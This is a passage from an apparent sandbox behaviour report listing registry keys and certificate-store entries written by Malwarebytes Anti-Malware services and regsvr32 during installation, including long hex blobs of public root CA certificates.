| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E149FEF9-F1DC-4894-8A8E-AA53F6807EFD}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A993F934-6341-4D52-AB17-F93184A624E4}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99E6F3FE-333C-462C-8C39-BC27DCA4A80E}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E230930A-6CC2-4B9D-8CE1-03F86A8EDA05}\ = "IScanControllerV10" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FB81F893-5D01-4DFD-98E1-3A6CB9C3E63E}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E3F70EF-D9BE-485F-A6F5-816DD0EDC757}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{929A5C6C-42D7-4248-9533-03C32165691F}\TypeLib\ = "{59DBD1B8-A7BD-4322-998F-41B0D2516FA0}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F053-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59E42E77-5F19-4602-A559-3FFA9EE51202}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2A153977-1A37-4EF7-9226-9E128FA51AE1}\ = "ITelemetryControllerV5" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83604-895E-11D0-B0A6-000000000000} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E\Blob = 0300000001000000140000000d44dd8c3c8c1a1a58756481e90f2e2affb3d26e2000000001000000ba010000308201b63082015ba0030201020213066c9fd5749736663f3b0b9ad9e89e7603f24a300a06082a8648ce3d0403023039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412033301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120333059301306072a8648ce3d020106082a8648ce3d030107034200042997a7c6417fc00d9be8011b56c6f252a5ba2db212e8d22ed7fac9c5d8aa6d1f73813b3b986b397c33a5c54e868e8017686245577d44581db337e56708eb66dea3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414abb6dbd7069e37ac3086079170c79cc419b178c0300a06082a8648ce3d0403020349003046022100e08592a317b78df92b06a593ac1a98686172fae1a1d0fb1c7860a64399c5b8c40221009c02eff1949cb396f9ebc62af8b62cfe3a901416d78c6324481cdf307dd5683b | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc03000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b680000000100000008000000000036044ddfd3017e0000000100000008000000000010c51e92d2011d0000000100000010000000177f789e96523e206c796917c848d50f0b000000010000001200000056006500720069005300690067006e000000140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea090000000100000016000000301406082b0601050507030306082b06010505070304620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce4460f0000000100000010000000a2011111cc748d961c35c67a0d5c8af520000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186819000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE\Blob = 030000000100000014000000f6108407d6f8bb67980cc2e244c2ebae1cef63be2000000001000000f6010000308201f230820178a0030201020213066c9fd7c1bb104c2943e5717b7b2cc81ac10e300a06082a8648ce3d0403033039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412034301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120343076301006072a8648ce3d020106052b8104002203620004d2ab8a374fa3530dfec18a7b4ba87b464b63b062f62d1bdb087121d200e863bd9a27fbf0396e5dea3da5c981aaa35b2098455d16dbfde8106de39ce0e3bd5f8462f3706433a0cb242f70ba88a12aa075f881ae6206c481db396e29b01efa2e5ca3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414d3ecc73a656ecce1da769a56fb9cf3866d57e581300a06082a8648ce3d040303036800306502303a8b21f1bd7e11add0ef58962fd6eb9d7e908d2bcf6655c32ce328a9700a470ef0375912ff2d9994284e2a4f354d335a023100ea75004e3bc43a941291c958469d211372a7889c8ae44c4adb96d4ac8b6b6b49125333add7e4be24fcb50a76d4a5bc10 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C\Blob = 0300000001000000140000002ad974a775f73cbdbbd8f5ac3a49255fa8fb1f8c2000000001000000620400003082045e30820346a0030201020213077312380b9d6688a33b1ed9bf9ccda68e0e0f300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3232303832333232323132385a170d3330303832333232323132385a303c310b3009060355040613025553310f300d060355040a1306416d617a6f6e311c301a06035504031313416d617a6f6e205253412032303438204d303130820122300d06092a864886f70d01010105000382010f003082010a0282010100eb712ca9cb1f8828923230af8a570f78b73725955587ac675c97d322c8daa214676b7cf067dae2032ab356125dc6b547f96708a7937a9592180fb4f9f910369a7f2f80b64fba134ec75d531ee0dd96330720d396bc12e4745042a1051373b54f9b4424fe2d7fedbc2285ec362133977506ce271882dce3d9c582078d5e26012626671fd93f13cf32ba6bad7864fcaaff0e023c07df9c0578728cfdea75b7032884dae86e078cd05085ef8154b2716eec6d62ef8f94c35ee9c4a4d091c02e249198caeeba258ed4f671b6fb5b6b38064837478d86dcf2ea06fb76377d9eff424e4d588293cfe271c278b17aab4b5b94378881e4d9af24aef872c565fb4bb451e70203010001a382015a3082015630120603551d130101ff040830060101ff020100300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302301d0603551d0e0416041481b80e638a891218e5fa3b3b50959fe6e5901385301f0603551d230418301680148418cc8534ecbc0c94942e08599cc7b2104e0a08307b06082b06010505070101046f306d302f06082b060105050730018623687474703a2f2f6f6373702e726f6f746361312e616d617a6f6e74727573742e636f6d303a06082b06010505073002862e687474703a2f2f6372742e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e636572303f0603551d1f043830363034a032a030862e687474703a2f2f63726c2e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e63726c30130603551d20040c300a3008060667810c010201300d06092a864886f70d01010b05000382010100ad00de0205232e063262b46bb19416e41140de2bfa59c135efe0aa8f2b41b9d1f38739001df23db5a7470c0606c691f3075702d4edbd17c1909abf4875a2074f30dd4a6a42b50d3d15c00ffe845bc63c99cc5752b1d86e12d59692934b94e507e88982086a7a34d49e64e13d876a92909a63a14bf88fb6ea34d305be20c2de06e28c9f738b9f4d3985cace19369d85c99ec9f8503fb67e88a1efca84068b50b40a5ca61c44f1fdc8614060f26125aa07f4c7c27375e40c0b428d04e55f4448995b7b898196a7889d4b0d62e804c4d7feb4e8b26dcaecc01cbc385b1ddf85ce5b7ae3494b6cb9a7ddf405b249ade1c5146bc2ccebcd7fd65869bac3207e7fb0b8 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 5c0000000100000004000000001000001900000001000000100000009f687581f7ef744ecfc12b9cee6238f10f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa2140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2040000000100000010000000be954f16012122448ca8bc279602acf52000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 5c000000010000000400000000040000190000000100000010000000e53d34cecb05c17ee332c749d78c02560f000000010000001000000065fc47520f66383962ec0b7b88a0821d03000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd2509000000010000000c000000300a06082b060105050703080b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e00670020004300410000001400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f0040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa2000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 0f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce446090000000100000016000000301406082b0601050507030306082b06010505070304140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea0b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000177f789e96523e206c796917c848d50f7e0000000100000008000000000010c51e92d201680000000100000008000000000036044ddfd30103000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b20000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf